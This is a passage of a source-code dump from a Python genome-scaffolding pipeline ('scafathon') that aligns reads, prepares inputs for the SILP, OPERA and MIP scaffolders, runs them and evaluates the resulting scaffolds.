0.6186079382896423, "avg_line_length": 40.2152214050293, "blob_id": "48689949114dc873eecf41293abc4fd75d21d7a3", "content_id": "4183ebc78fad20ceccd2fc1d6a3f8427a87a7c28", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15703, "license_type": "permissive", "max_line_length": 159, "num_lines": 381, "path": "/scafathon.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n'''\nstandalone adapter for scripts outside of the directory structure.\n'''\n### imports ###\n\n# system\nimport time\nimport subprocess\nimport warnings\nimport argparse\nimport logging\nimport time\nimport sys\nimport os\nimport numpy as np\n\nlogging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] %(message)s', )\n\n# local\nfrom utils.align import create_idx, create_aln, pair_sam, pair_sam2\nfrom utils.prep import prep_silp, prep_opera, prep_mip\nfrom utils.run import run_silp, run_opera, run_mip\nfrom utils.eval import simulation_evaluation, quast_evaluation\n\n# hack to silence argparser.\nwarnings.filterwarnings('ignore', category=DeprecationWarning)\n\n### classes ###\n\n### functions ###\n\ndef align(args):\n ''' aligns reads against reference '''\n\n # validate parameters.\n assert 
os.path.isdir(args.base_dir), 'base_dir'\n assert os.path.isfile(args.ctg_fasta), 'ctg_fasta'\n assert os.path.isfile(args.read1_fastq), 'read1_fastq'\n assert os.path.isfile(args.read2_fastq), 'read2_fastq'\n assert os.path.isfile(args.size_file), 'size_file'\n\n # relavent files.\n base_dir = os.path.abspath(args.base_dir)\n\n size_file = os.path.abspath(args.size_file)\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n read1_fastq = os.path.abspath(args.read1_fastq)\n read2_fastq = os.path.abspath(args.read2_fastq)\n\n tmp1_sam = os.path.abspath('%s/tmp1.sam' % base_dir)\n tmp2_sam = os.path.abspath('%s/tmp2.sam' % base_dir)\n\n read1_sam = os.path.abspath('%s/read1.sam' % base_dir)\n read2_sam = os.path.abspath('%s/read2.sam' % base_dir)\n\n ant_dir = '%s/ant' % base_dir\n idx_dir = '%s/index' % base_dir\n idx_file = '%s/index' % idx_dir\n\n # build index if not present.\n if os.path.isdir(idx_dir) == False:\n subprocess.call([\"mkdir\", \"-p\", idx_dir])\n create_idx(ctg_fasta, idx_file)\n\n # remove annotation dir if present.\n if os.path.isdir(ant_dir) == True:\n subprocess.call([\"rm\", \"-rf\", ant_dir])\n subprocess.call([\"mkdir\", \"-p\", ant_dir])\n\n # perform alignment.\n create_aln(size_file, idx_file, read1_fastq, tmp1_sam, ant_dir, args.num_cpu)\n create_aln(size_file, idx_file, read2_fastq, tmp2_sam, ant_dir, args.num_cpu)\n\n # pair the alignment.\n pair_sam2(tmp1_sam, tmp2_sam, read1_sam, read2_sam, args.key_size)\n\ndef pair(args):\n ''' pairs two same files '''\n\n # validate parameters.\n assert os.path.isdir(args.base_dir), 'base_dir'\n assert os.path.isfile(args.tmp1_sam), 'tmp1_sam'\n assert os.path.isfile(args.tmp2_sam), 'tmp2_sam'\n\n # relavent files.\n base_dir = os.path.abspath(args.base_dir)\n tmp1_sam = os.path.abspath(args.tmp1_sam)\n tmp2_sam = os.path.abspath(args.tmp2_sam)\n read1_sam = os.path.abspath('%s/read1.sam' % base_dir)\n read2_sam = os.path.abspath('%s/read2.sam' % base_dir)\n\n # pair the alignment.\n pair_sam2(tmp1_sam, tmp2_sam, read1_sam, read2_sam, args.key_size)\n\ndef meta_combine(args):\n \"\"\" combines two seperate alignments\"\"\"\n\n # validate parameters.\n assert os.path.isdir(args.base_dir), 'base_dir'\n assert os.path.isdir(args.work1_dir), 'w1_dir'\n assert os.path.isdir(args.work2_dir), 'w2_dir'\n\n # switch based on subset.\n if args.subsample == None:\n\n # combine reads.\n with open(\"%s/read1.sam\" % args.base_dir, \"wb\") as fout:\n subprocess.call([\"cat\",\"%s/read1.sam\" % args.work1_dir, \"%s/read1.sam\" % args.work2_dir], stdout=fout)\n\n with open(\"%s/read2.sam\" % args.base_dir, \"wb\") as fout:\n subprocess.call([\"cat\",\"%s/read2.sam\" % args.work1_dir, \"%s/read2.sam\" % args.work2_dir], stdout=fout)\n\n else:\n\n # count number of lines.\n cnt = 0\n with open(\"%s/read1.sam\" % args.work1_dir, \"r\") as fin:\n for line in fin:\n cnt += 1\n \n # only output a percentage of them.\n outp = float(cnt) * float(args.subsample)\n \n # first one.\n with open(\"%s/read1.sam\" % args.base_dir, \"wb\") as fout:\n cnt = 0\n with open(\"%s/read1.sam\" % args.work1_dir, \"r\") as fin:\n for line in fin:\n if cnt > outp: break\n fout.write(line)\n cnt += 1\n with open(\"%s/read1.sam\" % args.work2_dir, \"r\") as fin:\n for line in fin:\n fout.write(line)\n \n # second one.\n with open(\"%s/read2.sam\" % args.base_dir, \"wb\") as fout:\n cnt = 0\n with open(\"%s/read2.sam\" % args.work1_dir, \"r\") as fin:\n for line in fin:\n if cnt > outp: break\n fout.write(line)\n cnt += 1\n with open(\"%s/read2.sam\" % args.work2_dir, 
\"r\") as fin:\n for line in fin:\n fout.write(line)\n\n # copy one annotation.\n subprocess.call([\"cp\", \"%s/ant\" % args.work1_dir, \"%s/ant\" % args.base_dir, \"-R\"])\n subprocess.call([\"chmod\", \"u+w\", \"%s/ant\" % args.base_dir, \"-R\"])\n\n # combine the rest.\n tmp1_dir = \"%s/ant\" % args.base_dir\n tmp2_dir = \"%s/ant\" % args.work2_dir\n for x in os.listdir(tmp2_dir):\n\n # simplify.\n tmp1_x = \"%s/%s\" % (tmp1_dir,x)\n tmp2_x = \"%s/%s\" % (tmp2_dir,x)\n \n # copy it if no problem.\n if os.path.isfile(tmp1_x) == False:\n subprocess.call([\"cp\", tmp2_x, tmp1_x])\n\n else:\n # combine it.\n tmp1_n = np.load(tmp1_x)\n tmp2_n = np.load(tmp2_x)\n np.save(tmp1_x, tmp1_n+tmp2_n)\n\ndef prepare(args):\n \"\"\" prepares alignment given scaffolding method\"\"\"\n\n # extract information.\n work_dir = os.path.abspath(args.base_dir)\n align_dir = os.path.abspath(args.align_dir)\n ant_dir = '%s/ant' % align_dir\n\n read1_sam = '%s/read1.sam' % align_dir\n read2_sam = '%s/read2.sam' % align_dir\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n prep_sh = '%s/prep.sh' % work_dir\n\n # translate pairmode.\n if args.pair_mode == 0:\n pair_mode = 'ff'\n elif args.pair_mode == 1:\n pair_mode = 'fr'\n elif args.pair_mode == 2:\n pair_mode = 'rf'\n\n # run the right prepare.\n cmd_args = (work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, args.ins_size, args.std_dev, args.bundle_size, pair_mode, args)\n if args.meth_mode == 0:\n prep_silp(*cmd_args)\n elif args.meth_mode == 1:\n prep_opera(*cmd_args)\n elif args.meth_mode == 2:\n prep_mip(*cmd_args)\n\n\ndef run(args):\n \"\"\" extracts information for scaffolding\"\"\"\n\n # extract information.\n work_dir = os.path.abspath(args.base_dir)\n align_dir = os.path.abspath(args.align_dir)\n ant_dir = '%s/ant' % align_dir\n\n read1_sam = '%s/read1.sam' % align_dir\n read2_sam = '%s/read2.sam' % align_dir\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n ctg_agp = '%s/scf.agp' % work_dir\n scf_fasta = '%s/scf.fasta' % work_dir\n run_sh = '%s/run.sh' % work_dir\n\n # translate pairmode.\n if args.pair_mode == 0:\n pair_mode = 'ff'\n elif args.pair_mode == 1:\n pair_mode = 'fr'\n elif args.pair_mode == 2:\n pair_mode = 'rf'\n\n # run the right prepare.\n cmd_args = (work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, args.ins_size, args.std_dev, args.bundle_size, pair_mode, args)\n if args.meth_mode == 0:\n run_silp(*cmd_args)\n elif args.meth_mode == 1:\n run_opera(*cmd_args)\n elif args.meth_mode == 2:\n run_mip(*cmd_args)\n\ndef sim_eval(args):\n \"\"\"evaluates scaffold\"\"\"\n\n # simplify data.\n ref_fasta = os.path.abspath(args.ref_fasta)\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n scf_fasta = os.path.abspath(args.scf_fasta)\n ref_agp = os.path.abspath(args.ref_agp)\n scf_agp = os.path.abspath(args.scf_agp)\n\n # call evaluation code.\n A, B, C, D, ppv, mcc, gap_dev, runtime, ref_N50, ctg_N50, scf_N50, tp_N50 = simulation_evaluation(ref_fasta, ctg_fasta, scf_fasta, ref_agp, scf_agp)\n\n # format and return.\n txt = list()\n txt.append('%d %d %d %d' % (A, B, C, D))\n txt.append('%.2f %.2f' % (ppv, mcc))\n txt.append('%.2f %.2f' % (gap_dev, runtime))\n txt.append('%d %d %d %d' % (ref_N50, ctg_N50, scf_N50, tp_N50))\n print ' '.join(txt)\n\ndef real_eval(args):\n \"\"\"evaluates scaffold using alignme\"\"\"\n\n # simplify data.\n ref_fasta = os.path.abspath(args.ref_fasta)\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n scf_fasta = os.path.abspath(args.scf_fasta)\n #ref_agp = os.path.abspath(args.ref_agp)\n 
#scf_agp = os.path.abspath(args.scf_agp)\n\n # call quast\n res = quast_evaluation(ref_fasta, ctg_fasta, scf_fasta, args.wd, args.threads)\n\n\n # quast specific.\n try: N50 = int(float(res[1,np.where(res[0,:] == \"N50\")[0][0]]))\n except: N50 = 0\n try: NG50 = int(float(res[1,np.where(res[0,:] == \"NG50\")[0][0]]))\n except: NG50 = 0\n try: GFRAC = float(res[1,np.where(res[0,:] == \"Genome fraction (%)\")[0][0]])\n except: GFRAC = 0.0\n try: NA50 = int(float(res[1,np.where(res[0,:] == \"NA50\")[0][0]]))\n except: NA50 = 0\n try: NGA50 = int(float(res[1,np.where(res[0,:] == \"NGA50\")[0][0]]))\n except: NGA50 = 0\n\n # format and return.\n txt = list()\n txt.append(\"%d %d %.2f %d %d\" % (N50, NG50, GFRAC, NA50, NGA50))\n\n print ' '.join(txt)\n\n### script ###\n\nif __name__ == '__main__':\n\n # mode parser.\n main_p = argparse.ArgumentParser()\n subp = main_p.add_subparsers(help='sub-command help')\n\n ### data preparation ###\n # import reference into working directory.\n subp_p = subp.add_parser('align', help='aligns reads against contigs.')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='working directory')\n subp_p.add_argument('-p', dest='num_cpu', type=int, required=True, help='number of threads for bowtie2')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-q1', dest='read1_fastq', required=True, help='read first file')\n subp_p.add_argument('-q2', dest='read2_fastq', required=True, help='read second file')\n subp_p.add_argument('-s', dest='size_file', required=True, help='size file')\n subp_p.add_argument('-k', dest='key_size', type=int, required=True, help='size of PE key at end of each read')\n subp_p.set_defaults(func=align)\n\n subp_p = subp.add_parser('pair', help='pairs 2 SAM files')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='working directory')\n subp_p.add_argument('-s1', dest='tmp1_sam', required=True, help='read first file')\n subp_p.add_argument('-s2', dest='tmp2_sam', required=True, help='read second file')\n subp_p.add_argument('-k', dest='key_size', type=int, required=True, help='size of PE key at end of each read')\n subp_p.set_defaults(func=pair)\n\n # combines two seperate alignments.\n subp_p = subp.add_parser('meta_combine', help='combines two seperate alignments. 
Used for meta scaffold testing.')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='working directory')\n subp_p.add_argument('-w1', dest='work1_dir', required=True, help='working directory')\n subp_p.add_argument('-w2', dest='work2_dir', required=True, help='working directory')\n subp_p.add_argument('-s', dest='subsample', type=float, required=False, help='subsample first directory')\n subp_p.set_defaults(func=meta_combine)\n\n # prepare the reference for scaffolding.\n subp_p = subp.add_parser('prep', help='runs pre-processing stage.')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='scaffolding directory')\n subp_p.add_argument('-a', dest='align_dir', required=True, help='alignment directory')\n subp_p.add_argument('-i', dest='ins_size', type=int, required=True, help='insert size')\n subp_p.add_argument('-s', dest='std_dev', type=int, required=True, help='std_devition')\n subp_p.add_argument('-b', dest='bundle_size', type=int, required=True, help='bundle size')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-ff', dest='pair_mode', action='store_const', const=0, help='SOLiD style -> ->')\n me_g.add_argument('-fr', dest='pair_mode', action='store_const', const=1, help='innie style -> <-')\n me_g.add_argument('-rf', dest='pair_mode', action='store_const', const=2, help='outtie style <- ->')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-silp', dest='meth_mode', action='store_const', const=0, help='SILP')\n me_g.add_argument('-opera', dest='meth_mode', action='store_const', const=1, help='OPERA')\n me_g.add_argument('-mip', dest='meth_mode', action='store_const', const=2, help='MIP')\n subp_p.set_defaults(func=prepare)\n\n # run the scaffolding.\n subp_p = subp.add_parser('run', help='runs the actual scaffolding')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='scaffolding directory')\n subp_p.add_argument('-a', dest='align_dir', required=True, help='alignment directory')\n subp_p.add_argument('-i', dest='ins_size', type=int, required=True, help='insert size')\n subp_p.add_argument('-s', dest='std_dev', type=int, required=True, help='std_devition')\n subp_p.add_argument('-b', dest='bundle_size', type=int, required=True, help='bundle size')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-ff', dest='pair_mode', action='store_const', const=0, help='SOLiD style -> ->')\n me_g.add_argument('-fr', dest='pair_mode', action='store_const', const=1, help='innie style -> <-')\n me_g.add_argument('-rf', dest='pair_mode', action='store_const', const=2, help='outtie style <- ->')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-silp', dest='meth_mode', action='store_const', const=0, help='SILP')\n me_g.add_argument('-opera', dest='meth_mode', action='store_const', const=1, help='OPERA')\n me_g.add_argument('-mip', dest='meth_mode', action='store_const', const=2, help='MIP')\n # SILP2 arguments.\n subp_p.add_argument('-z', dest='weight_mode', type=int, default=0, help='SILP2: weight mode')\n subp_p.set_defaults(func=run)\n\n # evaluate the scaffolding.\n subp_p = subp.add_parser('sim_eval', help='evaluates scaffolding if there is a true AGP')\n subp_p.add_argument('-r', dest='ref_fasta', required=True, help='reference fasta')\n subp_p.add_argument('-c', 
dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-s', dest='scf_fasta', required=True, help='scaffold fasta')\n subp_p.add_argument('-a', dest='ref_agp', required=True, help='reference agp')\n subp_p.add_argument('-y', dest='scf_agp', required=True, help='predicted agp')\n subp_p.set_defaults(func=sim_eval)\n\n # evaluate the scaffolding.\n subp_p = subp.add_parser('real_eval', help='alignment based scaffold evaluation.')\n subp_p.add_argument('-r', dest='ref_fasta', required=True, help='reference fasta')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-s', dest='scf_fasta', required=True, help='scaffold fasta')\n subp_p.add_argument('-y', dest='scf_agp', required=True, help='predicted agp')\n subp_p.add_argument('-wd', dest='wd', required=True, help='alignment working directory')\n subp_p.add_argument('-p', dest='threads', type=int, required=True, help='number of threads to align')\n subp_p.set_defaults(func=real_eval)\n\n args = main_p.parse_args()\n args.func(args)\n" }, { "alpha_fraction": 0.492044597864151, "alphanum_fraction": 0.5010282397270203, "avg_line_length": 28.996753692626953, "blob_id": "4b73b226cb70b797a4d76f19ced2424522dc0848", "content_id": "7c8f300d3e7e1ca4a613c8ea4663795fedce5b01", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9239, "license_type": "permissive", "max_line_length": 143, "num_lines": 308, "path": "/utils/run.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "'''\ndrivers to prepare the data for scaffolding\n'''\nimport subprocess\nimport os\nimport time\nimport numpy as np\n\nfrom utils.misc import *\n\n## private functions ##\n\n## public functions ##\ndef run_silp(work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" SILP scaffolder \"\"\"\n\n # create command base.\n cmd_base = ['python', '/home/jrl03001/code/SILP2/silp.py']\n\n # scaffolding/\n job = list()\n job.append('#!/bin/bash')\n job.append('# scaffolding')\n job.append('# start time')\n job.append('start=$(date +%s)')\n job.append('%s orient -w %s -z %s ' % (' '.join(cmd_base), work_dir, args.weight_mode))\n job.append('%s order -w %s ' % (' '.join(cmd_base), work_dir))\n job.append('%s gap -w %s ' % (' '.join(cmd_base), work_dir))\n job.append('%s write -w %s -a %s' % (' '.join(cmd_base), work_dir, ctg_agp))\n job.append('%s fasta -w %s -a %s -c %s -f %s' % (' '.join(cmd_base), work_dir, ctg_agp, ctg_fasta, scf_fasta))\n job.append('# stop time')\n job.append('stop=$(date +%s)')\n job.append('echo RUNTIME: $(expr $stop - $start) >> %s' % ctg_agp)\n job.append('')\n runit(job, run_sh)\n\n\ndef run_opera(work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" OPERA scaffolder \"\"\"\n\n # opera specific directories.\n input_dir = '%s/input' % work_dir\n results_dir = '%s/results' % work_dir\n script_dir = '%s/script' % work_dir\n output_dir = '%s/output' % work_dir\n log_dir = '%s/log' % work_dir\n for x in [input_dir, results_dir, script_dir, output_dir, log_dir]:\n create_dir(x)\n\n # opera sepecific files.\n edge_file = '%s/opera_raw.txt' % input_dir\n config_file = '%s/opera.cfg' % input_dir\n script_file = '%s/opera.sh' % input_dir\n tout_file = '%s/scaffolds.scaf' % results_dir\n tscf_file = '%s/scaffoldSeq.fasta' % results_dir\n log_file = 
'%s/opera.log' % log_dir\n\n # write execution script.\n job = list()\n job.append('#!/bin/bash')\n job.append('# scaffolding')\n job.append('# start time')\n job.append('start=$(date +%s)')\n job.append('# run the job')\n job.append('/opt/opera/bin/opera %s &> %s' % (config_file, log_file))\n job.append('# stop time')\n job.append('stop=$(date +%s)')\n job.append('echo RUNTIME: $(expr $stop - $start) >> %s' % ctg_agp)\n job.append('')\n runit(job, run_sh)\n\n # load results.\n fin = open(tout_file, \"rb\")\n lines = fin.readlines()\n fin.close()\n\n # load the runtime string.\n with open(ctg_agp, 'rb') as fin:\n time_info = fin.readline().strip()\n\n # create an AGP.\n fout = open(ctg_agp, \"wb\")\n for lidx in range(len(lines)):\n\n # setup line.\n line = lines[lidx]\n\n # check header.\n if line[0] == \">\":\n header = line.strip().replace(\">\",\"\").split()[0]\n #header = line.strip().replace(\">\",\"\")\n part = 1\n scaf_start = 1\n scaf_stop = 0\n continue\n\n # tokenize.\n tmp = line.strip().split()\n\n # get ctgid.\n ctgid = tmp[0]\n\n if tmp[1] == \"BE\":\n orien = \"+\"\n else:\n orien = \"-\"\n\n ctglen = int(tmp[2])\n gaplen = int(tmp[3])\n\n # make indexs.\n scaf_stop = scaf_start + ctglen\n\n # write out AGP.\n fout.write(\"%s\\t%i\\t%i\\t%i\\t%s\\t%s\\t%i\\t%i\\t%s\\n\" % \\\n (header, scaf_start, scaf_stop, part, \"W\", ctgid, 1, ctglen, orien))\n #print \"write\"\n # increment pointers.\n scaf_start = scaf_stop + 1\n part += 1\n\n # add gap if size is not 0\n if gaplen != 0:\n\n # make indexs.\n scaf_stop = scaf_start + gaplen\n\n # add gap.\n fout.write(\"%s\\t%i\\t%i\\t%i\\t%s\\t%i\\t%s\\t%s\\n\" % \\\n (header, scaf_start, scaf_stop, part, \"N\", gaplen, \"fragment\", \"no\"))\n #print \"write\"\n # increment pointers.\n scaf_start = scaf_stop + 1\n part += 1\n\n # otherwise.\n else:\n # check if we can peak.\n if lidx+1 >= len(lines):\n continue\n\n\n # check if new scaffold.\n if lines[lidx+1][0] != \">\":\n # make fake gap.\n scaf_stop = scaf_start + 10\n\n # add gap.\n fout.write(\"%s\\t%i\\t%i\\t%i\\t%s\\t%i\\t%s\\t%s\\n\" % \\\n (header, scaf_start, scaf_stop, part, \"N\", gaplen, \"fragment\", \"no\"))\n #print \"write\"\n # increment pointers.\n scaf_start = scaf_stop + 1\n part += 1\n continue\n\n # write the timer.\n fout.write(time_info + '\\n')\n\n # close AGP file.\n fout.close()\n\n # move the output files to standard locations.\n subprocess.call(['cp', tscf_file, scf_fasta])\n\n\ndef run_mip(work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \n # simplify files.\n ant_dir = '/dev/null'\n\n contig_file = ctg_fasta\n test1 = read1_sam\n test2 = read2_sam\n \n # mip specific files.\n SAM_1_MOD = \"%s/sam_1.sam\" % work_dir\n SAM_2_MOD = \"%s/sam_2.sam\" % work_dir\n MERGED_FILE = \"%s/merged\" % work_dir\n MERGED1_FILE = \"%s/merged.sorted1\" % work_dir\n MERGED2_FILE = \"%s/merged.sorted2\" % work_dir\n FILTERED_FILE = \"%s/filtered.txt\" % work_dir\n COV_FILE = \"%s/coverage.txt\" % work_dir\n PARAM_FILE = \"%s/parameters.txt\" % work_dir\n MIP_FILE = \"%s/scaffolds2.txt\" % work_dir\n OUT_FILE = \"%s/scaffolds.fasta\" % work_dir\n\n \n # execute mip.\n tstart = time.time()\n cmd = list()\n cmd.append(\"/opt/mip/scripts/mip-scaffolder.pl\")\n cmd.append(PARAM_FILE)\n cmd.append(contig_file)\n cmd.append(COV_FILE)\n cmd.append(work_dir)\n \n with open(run_sh, \"wb\") as fout:\n fout.write('#!/bin/bash\\n')\n fout.write(' '.join(cmd) + '\\n')\n \n subprocess.call([\"chmod\", 
\"u+x\", run_sh])\n if subprocess.call([run_sh], cwd=work_dir) != 0:\n logging.warning(\"couldn't run mip\")\n sys.exit(1)\n tstop = time.time()\n \n # compute time.\n trun = tstop - tstart\n \n # load MIP results into dictionary.\n fin = open(MIP_FILE, \"rb\")\n lines = fin.readlines()\n fin.close()\n mip = {}\n for line in lines:\n \n # tokenize.\n tmp = line.split()\n \n # set current scaffold.\n if tmp[0].count(\"scaffold\") > 0:\n # set current.\n curs = tmp[0]\n \n # set default.\n mip[curs] = []\n continue\n \n # append.\n mip[curs].append(tmp)\n \n # count the number of rows for agp file.\n size = 0\n for scafid in mip:\n size += len(mip[scafid]) + len(mip[scafid]) - 1\n\n # allocate the array.\n agps = np.zeros(size, dtype=agp_dt)\n\n # begin copying data.\n idx = 0\n for scafid in mip:\n scaf_start = 1\n scaf_idx = 1\n for i in range(len(mip[scafid])):\n \n # tokenize.\n entry = mip[scafid][i]\n ctg_name = entry[1]\n if entry[2] == \"F\":\n orien = 0\n else:\n orien = 1\n start = int(entry[3])\n stop = int(entry[4])\n \n # add to agp.\n agps[idx]['scaf_name'] = scafid\n agps[idx]['scaf_start'] = scaf_start\n agps[idx]['scaf_stop'] = scaf_start + abs(stop - start)\n agps[idx]['scaf_idx'] = scaf_idx\n agps[idx]['comp_type'] = \"W\"\n agps[idx]['comp_name'] = ctg_name\n agps[idx]['comp_start'] = 1\n agps[idx]['comp_stop'] = abs(stop - start)\n agps[idx]['comp_orien'] = orien\n agps[idx]['comp_linkage'] = 0\n\n # move up counts.\n scaf_start = agps[idx]['scaf_stop'] + 1\n scaf_idx += 1\n idx += 1\n \n # do gap.\n if entry[1] != mip[scafid][-1][1]:\n \n # add gap.\n agps[idx]['scaf_name'] = scafid\n agps[idx]['scaf_start'] = scaf_start\n agps[idx]['scaf_stop'] = int(mip[scafid][i+1][3]) - 1\n agps[idx]['scaf_idx'] = scaf_idx\n agps[idx]['comp_type'] = \"N\"\n agps[idx]['comp_name'] = \"fragment\"\n agps[idx]['comp_start'] = 1\n agps[idx]['comp_stop'] = abs(agps[idx]['scaf_stop'] - agps[idx]['scaf_start'])\n agps[idx]['comp_orien'] = 0\n agps[idx]['comp_linkage'] = 0 \n \n # move up counts.\n scaf_start = int(mip[scafid][i+1][3])\n scaf_idx += 1\n idx += 1\n\n # copy results.\n subprocess.call(['cp', OUT_FILE, scf_fasta])\n\n # save the agp.\n save_agps(ctg_agp, agps)\n\n # add time.\n with open(ctg_agp, 'rb') as fin:\n lines = fin.read()\n lines += 'RUNTIME: %.2f' % trun\n with open(ctg_agp, 'wb') as fout:\n fout.write(lines)\n \n # move the results.\n" }, { "alpha_fraction": 0.5634479522705078, "alphanum_fraction": 0.5879085659980774, "avg_line_length": 28.347963333129883, "blob_id": "23fb19e71a1584efb496e8b0dceba6961f3c1cfb", "content_id": "825f69eff1e75df7cb3760926609f855d9f39086", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9362, "license_type": "permissive", "max_line_length": 167, "num_lines": 319, "path": "/utils/prep.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "'''\ndrivers to prepare the data for scaffolding\n'''\nimport sys\nimport logging\nimport string\nimport subprocess\nimport os\n\nfrom utils.misc import *\n\n## private functions ##\n\n## public functions ##\ndef prep_silp(work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" SILP scaffolder \"\"\"\n\n # create command base.\n cmd_base = ['python', '/home/jrl03001/code/SILP2/silp.py']\n\n # preprocess.\n job = list()\n job.append('#!/bin/bash')\n job.append('# preprocess')\n job.append('%s nodes -w %s -c %s' % (' '.join(cmd_base), work_dir, ctg_fasta))\n 
job.append('%s edges -w %s -i %i -s %i -%s -s1 %s -s2 %s' %\n (' '.join(cmd_base), work_dir, ins_size, std_dev, pair_mode, read1_sam, read2_sam))\n job.append('%s bundles -w %s -b %i -p 90 -bup 1 -r %s -i %i -s %i' % (' '.join(cmd_base), work_dir, bundle_size, ant_dir, ins_size, std_dev))\n job.append('%s decompose -w %s -m 2500' % (' '.join(cmd_base), work_dir))\n job.append('')\n runit(job, prep_sh)\n\ndef prep_opera(work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" opera scaffolder \"\"\"\n\n # opera specific directories.\n input_dir = '%s/input' % work_dir\n results_dir = '%s/results' % work_dir\n script_dir = '%s/script' % work_dir\n output_dir = '%s/output' % work_dir\n log_dir = '%s/log' % work_dir\n for x in [input_dir, results_dir, script_dir, output_dir, log_dir]:\n create_dir(x)\n\n # opera sepecific files.\n edge_file = '%s/opera_raw.txt' % input_dir\n config_file = '%s/opera.cfg' % input_dir\n script_file = '%s/opera.sh' % input_dir\n tout_file = '%s/scaffolds.scaf' % results_dir\n log_file = '%s/opera.log' % log_dir\n\n # open pair of sam files.\n fin1 = open(read1_sam, \"rb\")\n fin2 = open(read2_sam, \"rb\")\n fout = open(edge_file, 'wb')\n\n # create the edge file from paired sam.\n idx = 1\n for line1 in fin1:\n line2 = fin2.readline()\n\n # skip headers.\n if line1[0] == \"@\" or line2[0] == \"@\":\n continue\n\n # tokenize.\n tokens1 = line1.strip().split(\"\\t\")\n tokens2 = line2.strip().split(\"\\t\")\n\n # get data.\n rname1 = tokens1[2]\n rname2 = tokens2[2]\n\n qname1 = tokens1[0]\n qname2 = tokens2[0]\n\n pos1 = int(tokens1[3])\n pos2 = int(tokens2[3])\n\n szseq1 = len(tokens1[9])\n szseq2 = len(tokens2[9])\n\n seq1 = tokens1[9]\n seq2 = tokens2[9]\n\n # prepare orientation.\n if tokens1[1] == \"0\":\n orien1 = \"+\"\n else:\n orien1 = \"-\"\n if tokens2[1] == \"0\":\n orien2 = \"+\"\n else:\n orien2 = \"-\"\n\n # save names.\n nm1 = \"%i.1\" % idx\n nm2 = \"%i.2\" % idx\n idx += 1\n\n # create txt.\n line1 = \"%s\\t%s\\t%s\\t%i\\t%s\\t%s\\t%s\\n\" % (nm1, orien1, rname1, pos1, tokens1[9], tokens1[10], \"0\")\n line2 = \"%s\\t%s\\t%s\\t%i\\t%s\\t%s\\t%s\\n\" % (nm2, orien2, rname2, pos2, tokens2[9], tokens2[10], \"0\")\n\n # write to file.\n fout.write(line1)\n fout.write(line2)\n\n # close up shop.\n fin1.close()\n fin2.close()\n fout.close()\n\n # prepare config script\n txt = \"\"\"#\n# Essential Parameters\n#\n\n# Please always supply absolute path of each file,\n# Because relative path may not work all the time.\n\n# Output folder for final results\noutput_folder=${opera_results_dir}\n\n# Contig file\ncontig_file=${opera_node_file}\n\n#----------------------------------------------------------------------------------------------\n# Advanced Parameters\n\n#\n# Scaffolding related parameters\n#\n\n# Scaffold name in result file\nscaffold_name=scaffold\n\n# PET cluster threshold (default=5) (Opera will discard all clusters\n\n# Should Opera abort when running time for specific subgraph is longer\n# than 30 minutes (true or false, default=true)\nabort=false\n\n#----------------------------------------------------------------------------------------------\n#\n# Contig file related parameters\n#\n\n# Format of contig file (fasta or statistic, default=fasta)\nfile_format=fasta\n\n# Program name generating contig file (velvet or soap, default=velvet)\nfile_type=velvet\n\n# Should the repeat contigs be filtered (yes or no, default=true)\nfilter_repeat=yes\n\n# Repeat threshold (default=1.5): If the 
